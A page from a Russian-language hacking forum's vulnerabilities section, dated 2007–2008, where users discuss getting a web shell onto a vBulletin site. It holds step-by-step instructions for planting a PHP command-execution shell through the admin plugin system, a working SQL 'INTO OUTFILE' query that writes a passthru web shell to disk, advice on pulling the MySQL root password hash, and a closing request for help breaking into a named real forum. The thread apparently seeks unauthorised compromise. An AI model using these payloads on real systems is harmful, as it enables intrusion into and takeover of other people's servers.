ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 21.12.2007, 14:50
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

-rw-r--r--. да такие права но они выделины белым а не зееленым редактировать файлы нельзя
 

  #22  
Старый 21.12.2007, 14:53
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Твой кролик пишет - произнеси на англиском 1000 раз, тогда появится возможность и записи и чтения.
 

  #23  
Старый 21.12.2007, 14:57
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

флуд тут не нужен
 

  #24  
Старый 21.12.2007, 14:57
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile
 

  #25  
Старый 21.12.2007, 15:00
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

пробовал залить шел так
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

но ни чего не выходит смаилы тоже отдыхают у кого есть еще предложения
 

  #26  
Старый 21.12.2007, 15:05
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
если у тебя есть доступ к бд пробуй залить файл через into outfile, если не получится, попробуй извлечь логин и пасс рута из mysql.user, разшифруешь, подключишься к бд и снова попробуешь через into outfile
хоть кто то понял о чем я говорю какой запрос в базе надо выполнить что бы залить шел
 

  #27  
Старый 22.12.2007, 02:28
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

select '<?php @passthru($_GET[cmd]); ?>' into outfile '/fullpatch/shell.php' from table
директория должна быть открыта на запись [-rwxrwxrwx]
from table иногда нужно иногда нет, table любая таблица

google на что, об этом не раз писали и видео много
 

  #28  
Старый 03.01.2008, 16:59
Airbender
Новичок
Регистрация: 02.01.2008
Сообщений: 1
Провел на форуме:
14859

Репутация: 0
По умолчанию

народ помгаите взломать форум http://www.avatar-forums.com/ мне срочно нужно его ломануть или хотяб посмотрите может найдёте какие дыры
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ